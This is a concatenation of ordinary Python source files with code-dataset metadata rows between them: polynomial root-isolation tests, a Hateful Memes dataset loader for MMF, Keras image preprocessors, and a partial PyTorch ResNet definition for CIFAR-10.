((0, -QQ(40, 7)), (QQ(40, 7), 0)), ((0, 0), (QQ(40, 7), QQ(40, 7)))]
assert R._isolate_complex_roots_sqf(f, eps=QQ(1, 10)) == \
[((QQ(-25, 56), QQ(-5, 8)), (QQ(-5, 14), QQ(-15, 28))),
((QQ(-25, 56), QQ(15, 28)), (QQ(-5, 14), QQ(5, 8))),
((QQ(95, 56), QQ(-85, 56)), (QQ(25, 14), QQ(-10, 7))),
((QQ(95, 56), QQ(10, 7)), (QQ(25, 14), QQ(85, 56)))]
R, x = ring('x', QQ)
f = x**2/2 - 3*x/7 + 1
assert R._isolate_complex_roots_sqf(f) == [((0, -4), (4, 0)), ((0, 0), (4, 4))]
R, x = ring('x', EX)
pytest.raises(DomainError,
lambda: R._isolate_complex_roots_sqf(x, inf=(-1, 0),
sup=(1, 1)))
R, x = ring('x', QQ.algebraic_field(I))
f = x**4 + I*x**3 - x + 1
assert R._isolate_complex_roots_sqf(f, inf=(0, 0),
sup=(1, 1)) == [((0, 0), (1, QQ(1, 2)))]
assert R._isolate_complex_roots_sqf(f, inf=(0, 0), sup=(1, 1),
eps=QQ(1, 100)) == [((QQ(79, 128), QQ(19, 64)),
(QQ(5, 8), QQ(39, 128)))]
assert R._isolate_complex_roots_sqf(f, inf=(0, -1),
sup=(1, 1)) == [((0, -1), (1, QQ(-1, 2))),
((0, 0), (1, QQ(1, 2)))]
assert R._isolate_complex_roots_sqf(f, inf=(0, -1), sup=(1, 1),
eps=QQ(1, 100)) == [((QQ(79, 128), QQ(19, 64)),
(QQ(5, 8), QQ(39, 128))),
((QQ(45, 64), QQ(-91, 128)),
(QQ(91, 128), QQ(-45, 64)))]
f *= (x - 1)
assert R._isolate_complex_roots_sqf(f) == [((QQ(-401, 100), QQ(-401, 100)), (0, 0)),
((QQ(-401, 100), 0), (0, QQ(401, 100))),
((0, QQ(-401, 100)), (QQ(401, 100), 0)),
((0, 0), (QQ(401, 100), QQ(401, 100)))]
f = x**7 + I*x**4 - (2 + I)*x**3 - 3*x + 5
assert R._isolate_complex_roots_sqf(f) == [((QQ(-1001, 100), 0), (0, QQ(1001, 100))),
((QQ(-1001, 400), QQ(-1001, 800)), (QQ(-1001, 800), 0)),
((QQ(-1001, 800), QQ(-1001, 800)), (0, 0)),
((0, QQ(-1001, 400)), (QQ(1001, 400), QQ(-1001, 800))),
((0, QQ(-1001, 800)), (QQ(1001, 400), 0)),
((0, 0), (QQ(1001, 400), QQ(1001, 800))),
((0, QQ(1001, 800)), (QQ(1001, 400), QQ(1001, 400)))]
R, x = ring('x', QQ.algebraic_field(sqrt(2)))
f = -x**3 + sqrt(2)*x - 1
assert R._isolate_complex_roots_sqf(f) == [((0, QQ(-283, 100)), (QQ(283, 100), 0)),
((0, 0), (QQ(283, 100), QQ(283, 100)))]
R, x = ring('x', QQ.algebraic_field(sqrt(2)).algebraic_field(I))
f = -x**3 + I*x**2 + sqrt(2)*x - 1
assert R._isolate_complex_roots_sqf(f) == [((QQ(-283, 100), 0), (0, QQ(283, 100))),
((0, QQ(-283, 100)), (QQ(283, 100), 0)),
((0, 0), (QQ(283, 100), QQ(283, 100)))]
R, x = ring('x', EX)
pytest.raises(DomainError, lambda: R._isolate_complex_roots_sqf(x))
@pytest.mark.timeout(300)
@pytest.mark.slow
def test__isolate_complex_roots_sqf_2():
R, x = ring('x', ZZ)
f = x**40 - 15*x**17 - 21*x**3 + 11
res = R._isolate_complex_roots_sqf(f)
ans = [((QQ(-21, 16), QQ(-21, 128)), (QQ(-63, 64), 0)),
((QQ(-21, 16), 0), (QQ(-63, 64), QQ(21, 128))),
((QQ(-21, 16), QQ(-21, 64)), (QQ(-63, 64), QQ(-21, 128))),
((QQ(-21, 16), QQ(21, 128)), (QQ(-63, 64), QQ(21, 64))),
((QQ(-21, 16), QQ(-21, 32)), (QQ(-63, 64), QQ(-21, 64))),
((QQ(-21, 16), QQ(21, 64)), (QQ(-63, 64), QQ(21, 32))),
((QQ(-63, 64), QQ(-21, 32)), (QQ(-21, 32), QQ(-21, 64))),
((QQ(-63, 64), QQ(21, 64)), (QQ(-21, 32), QQ(21, 32))),
((QQ(-63, 64), QQ(-105, 128)), (QQ(-21, 32), QQ(-21, 32))),
((QQ(-63, 64), QQ(21, 32)), (QQ(-21, 32), QQ(105, 128))),
((QQ(-63, 64), QQ(-63, 64)), (QQ(-21, 32), QQ(-105, 128))),
((QQ(-63, 64), QQ(105, 128)), (QQ(-21, 32), QQ(63, 64))),
((QQ(-21, 32), QQ(-105, 128)), (QQ(-21, 64), QQ(-21, 32))),
((QQ(-21, 32), QQ(21, 32)), (QQ(-21, 64), QQ(105, 128))),
((QQ(-21, 32), QQ(-63, 64)), (QQ(-21, 64), QQ(-105, 128))),
((QQ(-21, 32), QQ(105, 128)), (QQ(-21, 64), QQ(63, 64))),
((QQ(-21, 32), QQ(-21, 16)), (QQ(-21, 64), QQ(-63, 64))),
((QQ(-21, 32), QQ(63, 64)), (QQ(-21, 64), QQ(21, 16))),
((QQ(-21, 64), QQ(-21, 16)), (QQ(0, 1), QQ(-63, 64))),
((QQ(-21, 64), QQ(63, 64)), (QQ(0, 1), QQ(21, 16))),
((QQ(0, 1), QQ(-147, 128)), (QQ(21, 128), QQ(-63, 64))),
((QQ(0, 1), QQ(63, 64)), (QQ(21, 128), QQ(147, 128))),
((QQ(21, 128), QQ(-147, 128)), (QQ(21, 64), QQ(-63, 64))),
((QQ(21, 128), QQ(63, 64)), (QQ(21, 64), QQ(147, 128))),
((QQ(21, 64), QQ(-63, 64)), (QQ(63, 128), QQ(-105, 128))),
((QQ(21, 64), QQ(105, 128)), (QQ(63, 128), QQ(63, 64))),
((QQ(63, 128), QQ(-63, 64)), (QQ(21, 32), QQ(-105, 128))),
((QQ(63, 128), QQ(105, 128)), (QQ(21, 32), QQ(63, 64))),
((QQ(21, 32), QQ(-21, 64)), (QQ(63, 64), 0)),
((QQ(21, 32), 0), (QQ(63, 64), QQ(21, 64))),
((QQ(21, 32), QQ(-21, 32)), (QQ(21, 16), QQ(-21, 64))),
((QQ(21, 32), QQ(21, 64)), (QQ(21, 16), QQ(21, 32))),
((QQ(21, 32), QQ(-105, 128)), (QQ(63, 64), QQ(-21, 32))),
((QQ(21, 32), QQ(21, 32)), (QQ(63, 64), QQ(105, 128))),
((QQ(21, 32), QQ(-63, 64)), (QQ(63, 64), QQ(-105, 128))),
((QQ(21, 32), QQ(105, 128)), (QQ(63, 64), QQ(63, 64))),
((QQ(63, 64), QQ(-21, 64)), (QQ(21, 16), 0)),
((QQ(63, 64), 0), (QQ(21, 16), QQ(21, 64)))]
assert res == ans
def test__isolate_all_roots_sqf():
R, x = ring('x', ZZ)
f = (4*x**3 - x**2 + 2*x + 5)*x
assert R._isolate_all_roots_sqf(f) == \
([(-1, 0), (0, 0)],
[((0, -QQ(5, 2)), (QQ(5, 2), 0)), ((0, 0), (QQ(5, 2), QQ(5, 2)))])
assert R._isolate_all_roots_sqf(f, eps=QQ(1, 10)) == \
([(QQ(-7, 8), QQ(-6, 7)), (0, 0)],
[((QQ(35, 64), -QQ(35, 32)), (QQ(5, 8), -QQ(65, 64))), ((QQ(35, 64), QQ(65, 64)), (QQ(5, 8), QQ(35, 32)))])
R, x = ring('x', EX)
pytest.raises(DomainError, lambda: R._isolate_all_roots_sqf(x, R))
def test__isolate_all_roots():
R, x = ring('x', ZZ)
f = (4*x**3 - x**2 + 2*x + 5)*x
assert R._isolate_all_roots(f) == \
([((-1, 0), 1), ((0, 0), 1)],
[(((0, -QQ(5, 2)), (QQ(5, 2), 0)), 1),
(((0, 0), (QQ(5, 2), QQ(5, 2))), 1)])
assert R._isolate_all_roots(f, eps=QQ(1, 10)) == \
([((QQ(-7, 8), QQ(-6, 7)), 1), ((0, 0), 1)],
[(((QQ(35, 64), -QQ(35, 32)), (QQ(5, 8), -QQ(65, 64))), 1),
(((QQ(35, 64), QQ(65, 64)), (QQ(5, 8), QQ(35, 32))), 1)])
f = (x - 1)**2*(x + 1)**3
pytest.raises(NotImplementedError, lambda: R._isolate_all_roots(f))
D, y = ring('y', ZZ)
R, x = ring('x', D)
f = x**2 + y*x - 1
pytest.raises(DomainError, lambda: R._isolate_all_roots(f))
def test_RealInterval():
_, x = ring('x', ZZ)
f = (x - 1)**2
pytest.raises(ValueError, lambda: RealInterval((-2, 1), f))
def test_ComplexInterval():
R, x = ring('x', QQ.algebraic_field(I))
f = x**3 + x + I
_, r1, r2 = R._isolate_complex_roots_sqf(f, blackbox=True)
assert r1.is_disjoint(r2) is True
assert r1.is_disjoint(r2, check_re_refinement=True) is False
for _ in range(4):
r1, r2 = r1.refine(), r2.refine()
assert r1.is_disjoint(r2, check_re_refinement=True) is True
(u1, v1), (s1, t1) = r1.as_tuple()
(u2, v2), (s2, t2) = r1.refine(vertical=True).as_tuple()
assert v1 == v2 and t1 == t2
assert u1 <= u2 < s2 < s1
def test_issue_745():
D, y = ring('y', ZZ)
R, x = ring('x', D)
pytest.raises(DomainError, lambda: R._count_real_roots(x**7 + y*x + 1))
| 34.594801 | 123 | 0.492022 | 8,194 | 45,250 | 2.535026 | 0.03649 | 0.125024 | 0.111207 | 0.121943 | 0.838725 | 0.813162 | 0.770942 | 0.726314 | 0.670662 | 0.602927 | 0 | 0.143458 | 0.264729 | 45,250 | 1,307 | 124 | 34.62127 | 0.480869 | 0.003359 | 0 | 0.332566 | 0 | 0 | 0.002351 | 0 | 0 | 0 | 0 | 0 | 0.453395 | 1 | 0.035673 | false | 0 | 0.004603 | 0 | 0.040276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6076671796a6ecedf8afe47d0e0cb9d3110f507c | 10,212 | py | Python | mmf/datasets/builders/hateful_memes/dataset.py | hivestrung/mmf | 6a563010979d7a634045428a368a57ed2185f35a | [
"BSD-3-Clause"
] | null | null | null | mmf/datasets/builders/hateful_memes/dataset.py | hivestrung/mmf | 6a563010979d7a634045428a368a57ed2185f35a | [
"BSD-3-Clause"
] | null | null | null | mmf/datasets/builders/hateful_memes/dataset.py | hivestrung/mmf | 6a563010979d7a634045428a368a57ed2185f35a | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
import copy
import os
import numpy as np
import omegaconf
import torch
from mmf.common.sample import Sample
from mmf.datasets.mmf_dataset import MMFDataset
from mmf.utils.general import get_mmf_root
from mmf.utils.visualize import visualize_images
from PIL import Image
from torchvision import transforms
class HatefulMemesFeaturesDataset(MMFDataset):
def __init__(self, config, *args, dataset_name="hateful_memes", **kwargs):
super().__init__(dataset_name, config, *args, **kwargs)
assert (
self._use_features
), "config's 'use_images' must be true to use image dataset"
self.is_multilabel = self.config.get("is_multilabel", False)
def preprocess_sample_info(self, sample_info):
image_path = sample_info["img"]
# img/02345.png -> 02345
feature_path = image_path.split("/")[-1].split(".")[0]
# Add feature_path key for feature_database access
sample_info["feature_path"] = f"{feature_path}.npy"
return sample_info
def __getitem__(self, idx):
sample_info = self.annotation_db[idx]
sample_info = self.preprocess_sample_info(sample_info)
current_sample = Sample()
processed_text = self.text_processor({"text": sample_info["text"]})
current_sample.text = processed_text["text"]
if "input_ids" in processed_text:
current_sample.update(processed_text)
current_sample.id = torch.tensor(int(sample_info["id"]), dtype=torch.int)
# Instead of using idx directly here, use sample_info to fetch
# the features as feature_path has been dynamically added
features = self.features_db.get(sample_info)
if hasattr(self, "transformer_bbox_processor"):
features["image_info_0"] = self.transformer_bbox_processor(
features["image_info_0"]
)
current_sample.update(features)
fg_dataset_type = self.config.get("fg_dataset_type", None)
if fg_dataset_type:
current_sample = self.process_fg_labels(
fg_dataset_type=fg_dataset_type,
sample_info=sample_info,
current_sample=current_sample,
)
else:
if "label" in sample_info:
current_sample.targets = torch.tensor(
sample_info["label"], dtype=torch.long
)
return current_sample
def process_fg_labels(self, fg_dataset_type, sample_info, current_sample):
"""
If fg_dataset_type is present, it means we are using
the Hateful Memes Fine Grained datasets. It is the same
hateful memes datasets but have additional labels for
protected groups and attack vectors. More details see:
https://github.com/facebookresearch/fine_grained_hateful_memes
"""
ds_type_to_label = {
"attack": sample_info["top_attacks"],
"pc": sample_info["top_protectedcats"],
"pc_attack": sample_info["top_protectedcats"] + sample_info["top_attacks"],
"hateful_pc_attack": sample_info["top_protectedcats"]
+ sample_info["top_attacks"]
+ ["hateful" if int(sample_info["label"]) == 1 else "not_hateful"],
}
processed = self.answer_processor(
{"answers": ds_type_to_label[fg_dataset_type]}
)
current_sample.answers = processed["answers"]
current_sample.targets = processed["answers_scores"]
return current_sample
def format_for_prediction(self, report):
if self.is_multilabel:
return generate_multilabel_prediction(report)
else:
return generate_binary_prediction(report)
class HatefulMemesImageDataset(MMFDataset):
def __init__(self, config, *args, dataset_name="hateful_memes", **kwargs):
super().__init__(dataset_name, config, *args, **kwargs)
assert (
self._use_images
), "config's 'use_images' must be true to use image dataset"
self.is_multilabel = self.config.get("is_multilabel", False)
def init_processors(self):
super().init_processors()
# Assign transforms to the image_db
self.image_db.transform = self.image_processor
def __getitem__(self, idx):
sample_info = self.annotation_db[idx]
current_sample = Sample()
processed_text = self.text_processor({"text": sample_info["text"]})
current_sample.text = processed_text["text"]
if "input_ids" in processed_text:
current_sample.update(processed_text)
current_sample.id = torch.tensor(int(sample_info["id"]), dtype=torch.int)
# Get the first image from the set of images returned from the image_db
current_sample.image = self.image_db[idx]["images"][0]
if "label" in sample_info:
current_sample.targets = torch.tensor(
sample_info["label"], dtype=torch.long
)
return current_sample
def format_for_prediction(self, report):
if self.is_multilabel:
return generate_multilabel_prediction(report)
else:
return generate_binary_prediction(report)
def visualize(self, num_samples=1, use_transforms=False, *args, **kwargs):
image_paths = []
random_samples = np.random.randint(0, len(self), size=num_samples)
for idx in random_samples:
image_paths.append(self.annotation_db[idx]["img"])
images = self.image_db.from_path(image_paths, use_transforms=use_transforms)
visualize_images(images["images"], *args, **kwargs)
class HatefulMemesImageAndFeaturesDataset(MMFDataset):
def __init__(self, config, *args, dataset_name="hateful_memes", **kwargs):
super().__init__(dataset_name, config, *args, **kwargs)
assert (
self._use_features and self._use_images
), "config's 'use_images' and 'use_features' must be true to use both image and feature dataset"
self.is_multilabel = self.config.get("is_multilabel", False)
def init_processors(self):
super().init_processors()
# Assign transforms to the image_db
self.image_db.transform = self.image_processor
def preprocess_sample_info(self, sample_info):
image_path = sample_info["img"]
# img/02345.png -> 02345
feature_path = image_path.split("/")[-1].split(".")[0]
# Add feature_path key for feature_database access
sample_info["feature_path"] = f"{feature_path}.npy"
return sample_info
def __getitem__(self, idx):
sample_info = self.annotation_db[idx]
sample_info = self.preprocess_sample_info(sample_info)
current_sample = Sample()
processed_text = self.text_processor({"text": sample_info["text"]})
current_sample.text = processed_text["text"]
if "input_ids" in processed_text:
current_sample.update(processed_text)
current_sample.id = torch.tensor(int(sample_info["id"]), dtype=torch.int)
# Get the first image from the set of images returned from the image_db
current_sample.image = self.image_db[idx]["images"][0]
# Instead of using idx directly here, use sample_info to fetch
# the features as feature_path has been dynamically added
features = self.features_db.get(sample_info)
if hasattr(self, "transformer_bbox_processor"):
features["image_info_0"] = self.transformer_bbox_processor(
features["image_info_0"]
)
current_sample.update(features)
fg_dataset_type = self.config.get("fg_dataset_type", None)
if fg_dataset_type:
current_sample = self.process_fg_labels(
fg_dataset_type=fg_dataset_type,
sample_info=sample_info,
current_sample=current_sample,
)
else:
if "label" in sample_info:
current_sample.targets = torch.tensor(
sample_info["label"], dtype=torch.long
)
return current_sample
def process_fg_labels(self, fg_dataset_type, sample_info, current_sample):
"""
If fg_dataset_type is present, it means we are using
the Hateful Memes Fine Grained datasets. It is the same
hateful memes datasets but have additional labels for
protected groups and attack vectors. More details see:
https://github.com/facebookresearch/fine_grained_hateful_memes
"""
ds_type_to_label = {
"attack": sample_info["top_attacks"],
"pc": sample_info["top_protectedcats"],
"pc_attack": sample_info["top_protectedcats"] + sample_info["top_attacks"],
"hateful_pc_attack": sample_info["top_protectedcats"]
+ sample_info["top_attacks"]
+ ["hateful" if int(sample_info["label"]) == 1 else "not_hateful"],
}
processed = self.answer_processor(
{"answers": ds_type_to_label[fg_dataset_type]}
)
current_sample.answers = processed["answers"]
current_sample.targets = processed["answers_scores"]
return current_sample
def format_for_prediction(self, report):
if self.is_multilabel:
return generate_multilabel_prediction(report)
else:
return generate_binary_prediction(report)
def generate_binary_prediction(report):
scores = torch.nn.functional.softmax(report.scores, dim=1)
_, labels = torch.max(scores, 1)
# Probability that the meme is hateful, (1)
probabilities = scores[:, 1]
predictions = []
for idx, image_id in enumerate(report.id):
proba = probabilities[idx].item()
label = labels[idx].item()
predictions.append({"id": image_id.item(), "proba": proba, "label": label})
return predictions
def generate_multilabel_prediction(report):
scores = torch.sigmoid(report.scores)
return [
{"id": image_id.item(), "scores": scores[idx].tolist()}
for idx, image_id in enumerate(report.id)
]
| 39.276923 | 104 | 0.652761 | 1,222 | 10,212 | 5.162848 | 0.148118 | 0.087177 | 0.032969 | 0.03281 | 0.829291 | 0.826914 | 0.826914 | 0.821366 | 0.811222 | 0.811222 | 0 | 0.004968 | 0.250979 | 10,212 | 259 | 105 | 39.428571 | 0.819846 | 0.121328 | 0 | 0.721925 | 0 | 0 | 0.108148 | 0.005876 | 0 | 0 | 0 | 0 | 0.016043 | 1 | 0.096257 | false | 0 | 0.058824 | 0 | 0.251337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6088c95fcb6703defe1575c92ace84258115fbad | 2,222 | py | Python | keras_image_helper/preprocessors.py | alexeygrigorev/keras-image-helper | 1fea06a0e1343133f7c2ecdc7d7a9390d0503ae5 | [
"WTFPL"
] | 4 | 2020-10-31T15:53:34.000Z | 2021-11-27T10:35:21.000Z | keras_image_helper/preprocessors.py | alexeygrigorev/keras-image-helper | 1fea06a0e1343133f7c2ecdc7d7a9390d0503ae5 | [
"WTFPL"
] | null | null | null | keras_image_helper/preprocessors.py | alexeygrigorev/keras-image-helper | 1fea06a0e1343133f7c2ecdc7d7a9390d0503ae5 | [
"WTFPL"
] | null | null | null |
from keras_image_helper.base import BasePreprocessor
def tf_preprocessing(x):
x /= 127.5
x -= 1.0
return x
def caffe_preprocessing(x):
# 'RGB'->'BGR'
x = x[..., ::-1]
mean = [103.939, 116.779, 123.68]
x[..., 0] -= mean[0]
x[..., 1] -= mean[1]
x[..., 2] -= mean[2]
return x
class ResnetPreprocessor(BasePreprocessor):
# sources:
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/xception.py
# preprocess_input:
# imagenet_utils.preprocess_input(x, mode='tf', **kwargs)
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
# _preprocess_numpy_input, mode == 'tf'
#
def preprocess(self, X):
return caffe_preprocessing(X)
class XceptionPreprocessor(BasePreprocessor):
# sources:
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/xception.py
# preprocess_input:
# imagenet_utils.preprocess_input(x, mode='tf', **kwargs)
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
# _preprocess_numpy_input, mode == 'tf'
#
def preprocess(self, x):
return tf_preprocessing(x)
class VGGPreprocessor(BasePreprocessor):
# sources:
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/vgg16.py
# preprocess_input = imagenet_utils.preprocess_input
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
# _preprocess_numpy_input, mode == 'caffe'
#
def preprocess(self, x):
return caffe_preprocessing(x)
class InceptionPreprocessor(BasePreprocessor):
# sources:
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/inception_v3.py
# imagenet_utils.preprocess_input(x, mode='tf', **kwargs)
#
# https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
# _preprocess_numpy_input, mode == 'tf'
#
def preprocess(self, x):
return tf_preprocessing(x) | 28.126582 | 103 | 0.672817 | 260 | 2,222 | 5.580769 | 0.203846 | 0.187457 | 0.077188 | 0.104755 | 0.815989 | 0.815989 | 0.815989 | 0.784976 | 0.784976 | 0.735355 | 0 | 0.018384 | 0.192169 | 2,222 | 79 | 104 | 28.126582 | 0.789972 | 0.565707 | 0 | 0.291667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.041667 | 0.166667 | 0.708333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
60da722310c6fb91415e92b1feb39769b5aba71b | 12,631 | py | Python | model/ResNet.py | shamoji101/Pytorch-Gym | d16e25e5034d241b75bece5e20b3421a81a94b5c | [
"MIT"
] | 4 | 2018-09-23T10:15:38.000Z | 2018-11-11T23:59:12.000Z | model/ResNet.py | shamoji101/Pytorch-Gym | d16e25e5034d241b75bece5e20b3421a81a94b5c | [
"MIT"
] | 1 | 2018-09-25T13:53:58.000Z | 2018-09-25T13:57:10.000Z | model/ResNet.py | shamoji101/Pytorch-Gym | d16e25e5034d241b75bece5e20b3421a81a94b5c | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.nn import functional as F
"""
This code is building ResNet model for CIFAR-10.
You can get the paper of ResNet from
https://arxiv.org/abs/1512.03385
this page.
"""
class ResBlock(nn.Module):
def __init__(self, Channel,kernel_size=3, padding=1, use_dropout=True):
super(ResBlock, self).__init__()
self.C=Channel
self.K=kernel_size
self.P=padding
self.FirstConv = nn.Conv2d(self.C,self.C,kernel_size=self.K, padding=padding)
self.bn1 = nn.BatchNorm2d(self.C)
self.LastConv = nn.Conv2d(self.C, self.C, kernel_size=self.K, padding=padding)
self.bn2 = nn.BatchNorm2d(self.C)
self.use_dropout = use_dropout
self.dropout = nn.Dropout(p=0.25, inplace=False)
def forward(self, x):
out = self.FirstConv(x)
out = self.bn1(out)
out = F.relu(out)
out = self.LastConv(out)
out = self.bn2(out)
F_x = F.relu(out)
if self.use_dropout:
F_x = self.dropout(F_x)
y = F_x + x #short cut
y = F.relu(y)
return y
class ResBottleneck(nn.Module):
def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
super(ResBottleneck, self).__init__()
self.C = Channel
self.K = kernel_size
self.P = padding
self.C_small = self.C//4
self.use_dropout = use_dropout
self.FirstConv = nn.Conv2d(self.C, self.C_small, kernel_size=1)
self.bn1 = nn.BatchNorm2d(self.C_small)
self.BottleneckConv = nn.Conv2d(self.C_small, self.C_small, kernel_size=self.K, padding=self.P)
self.bn2 = nn.BatchNorm2d(self.C_small)
self.LastConv = nn.Conv2d(self.C_small, self.C, kernel_size=1)
self.bn3 = nn.BatchNorm2d(self.C)
self.dropout = nn.Dropout(p=0.25, inplace=False)
def forward(self, x):
out = self.FirstConv(x)
out = self.bn1(out)
out = F.relu(out)
out = self.BottleneckConv(out)
out = self.bn2(out)
out = F.relu(out)
out = self.LastConv(out)
out = self.bn3(out)
F_x = F.relu(out)
if self.use_dropout:
F_x = self.dropout(F_x)
y = F_x + x #short cut
y = F.relu(y)
return y
class IncreaseChannel_ResBlock(nn.Module):
def __init__(self,input_Channel, after_Channel,kernel_size,stride,padding, use_dropout=True):
super(IncreaseChannel_ResBlock, self).__init__()
self.I=input_Channel
self.A=after_Channel
self.K=kernel_size
self.P=padding
self.S=stride
self.FirstConv = nn.Conv2d(self.I,self.A,kernel_size=self.K, stride=self.S,padding=self.P)
self.bn1 = nn.BatchNorm2d(self.A)
self.use_dropout = use_dropout
self.dropout = nn.Dropout(p=0.25, inplace=False)
self.LastConv = nn.Conv2d(self.A, self.A, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm2d(self.A)
self.DownsampleConv = nn.Conv2d(self.I, self.A, kernel_size=self.K, stride=self.S, padding=self.P)
self.bn3 = nn.BatchNorm2d(self.A)
def forward(self, x):
out = self.FirstConv(x)
out = self.bn1(out)
out = F.relu(out)
out = self.LastConv(out)
out = self.bn2(out)
out = F.relu(out)
if self.use_dropout:
out = self.dropout(out)
out = F.relu(out)
return out
class IncreaseChannel_ResBottleneck(nn.Module):
def __init__(self, input_Channel, after_Channel, kernel_size, stride, padding, isFirstConv=False ,use_dropout=True):
super(IncreaseChannel_ResBottleneck, self).__init__()
self.I=input_Channel
if isFirstConv:
self.M=self.I
else:
self.M=self.I//2
self.A=after_Channel
self.K=kernel_size
self.P=padding
self.S=stride
self.FirstConv = nn.Conv2d(self.I,self.M,kernel_size=1, stride=1,padding=0)
self.bn1 = nn.BatchNorm2d(self.M)
self.use_dropout = use_dropout
self.dropout = nn.Dropout(p=0.25, inplace=False)
self.SecondConv = nn.Conv2d(self.M, self.M, kernel_size=3, stride=self.S, padding=1)
self.bn2 = nn.BatchNorm2d(self.M)
self.LastConv = nn.Conv2d(self.M, self.A, kernel_size=1, padding=0)
self.bn3 = nn.BatchNorm2d(self.A)
def forward(self, x):
x = self.FirstConv(x)
x = self.bn1(x)
x = F.relu(x)
x = self.SecondConv(x)
x = self.bn2(x)
x = F.relu(x)
x = self.LastConv(x)
x = self.bn3(x)
if self.use_dropout:
x = self.dropout(x)
x = F.relu(x)
return x
class pre_act_ResBlock(nn.Module):
"""
This code acordding to this paper from
https://arxiv.org/abs/1603.05027
"Identity Mappings in Deep Residual Networks"
"""
def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
super(pre_act_ResBlock, self).__init__()
self.C=Channel
self.K=kernel_size
self.P=padding
self.FirstConv = nn.Conv2d(self.C,self.C,kernel_size=self.K, padding=padding)
self.bn1 = nn.BatchNorm2d(self.C)
self.LastConv = nn.Conv2d(self.C, self.C, kernel_size=self.K, padding=padding)
self.bn2 = nn.BatchNorm2d(self.C)
self.use_dropout = use_dropout
self.dropout = nn.Dropout(p=0.25, inplace=False)
def forward(self, x):
out = self.bn1(x)
out = F.relu(out)
out = self.FirstConv(out)
out = self.bn2(out)
out = F.relu(out)
F_x = self.LastConv(out)
if self.use_dropout:
F_x = self.dropout(F_x)
y = F_x + x
return y
class pre_act_ResBottleneck(nn.Module):
def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
super(pre_act_ResBottleneck, self).__init__()
self.K = kernel_size
self.P = padding
self.C_small = self.C//4
self.use_dropout = use_dropout
self.FirstConv = nn.Conv2d(self.C, self.C_small, kernel_size=1)
self.bn1 = nn.BatchNorm2d(self.C_small)
self.BottleneckConv = nn.Conv2d(self.C_small, self.C_small, kernel_size=self.K, padding=self.P)
self.bn2 = nn.BatchNorm2d(self.C_small)
self.LastConv = nn.Conv2d(self.C_small, self.C, kernel_size=1)
self.bn3 = nn.BatchNorm2d(self.C)
self.dropout = nn.Dropout(p=0.25, inplace=False)
def forward(self, x):
out = self.bn1(x)
out = F.relu(out)
out = self.FirstConv(out)
out = self.bn2(out)
out = F.relu(out)
out = self.BottleneckConv(out)
out = self.bn3(out)
out = F.relu(out)
F_x = self.LastConv(out)
if self.use_dropout:
F_x = self.dropout(F_x)
y = F_x + x #short cut
return y
class ResNet18_forCIFAR10(nn.Module):
def __init__(self):
super(ResNet18_forCIFAR10, self).__init__()
self.FirstConv = IncreaseChannel_ResBlock(3,64, kernel_size=3, stride=1, padding=1)
self.Conv2_1 = ResBlock(64, kernel_size=3, padding=1)
self.SecondConv = IncreaseChannel_ResBlock(64,128, kernel_size=3, stride=2, padding=1)
self.Conv3_1 = ResBlock(128, kernel_size=3, padding=1)
self.ThirdConv = IncreaseChannel_ResBlock(128,256, kernel_size=3, stride=2, padding=1)
self.Conv4_1 = ResBlock(256, kernel_size=3, padding=1)
self.LastConv = IncreaseChannel_ResBlock(256,512, kernel_size=3, stride=2, padding=1)
self.Conv5_1 = ResBlock(512, kernel_size=3, padding=1)
self.GAP = nn.AvgPool2d(4)
self.Dense = nn.Linear(512,10)
def forward(self, x):
x = self.FirstConv(x)
x = self.Conv2_1(x)
x = self.SecondConv(x)
x = self.Conv3_1(x)
x = self.ThirdConv(x)
x = self.Conv4_1(x)
x = self.LastConv(x)
x = self.Conv5_1(x)
x = self.GAP(x)
x = x.view(-1,512)
x = self.Dense(x)
return x
class ResNet34_forCIFAR10(nn.Module):
def __init__(self):
super(ResNet34_forCIFAR10, self).__init__()
self.FirstConv = IncreaseChannel_ResBlock(3,64, kernel_size=3, stride=1, padding=1)
self.Conv2_1 = ResBlock(64, kernel_size=3, padding=1)
self.Conv2_2 = ResBlock(64, kernel_size=3, padding=1)
self.SecondConv = IncreaseChannel_ResBlock(64,128, kernel_size=3, stride=2, padding=1)
self.Conv3_1 = ResBlock(128, kernel_size=3, padding=1)
self.Conv3_2 = ResBlock(128, kernel_size=3, padding=1)
self.Conv3_3 = ResBlock(128, kernel_size=3, padding=1)
self.ThirdConv = IncreaseChannel_ResBlock(128,256, kernel_size=3, stride=2, padding=1)
self.Conv4_1 = ResBlock(256, kernel_size=3, padding=1)
self.Conv4_2 = ResBlock(256, kernel_size=3, padding=1)
self.Conv4_3 = ResBlock(256, kernel_size=3, padding=1)
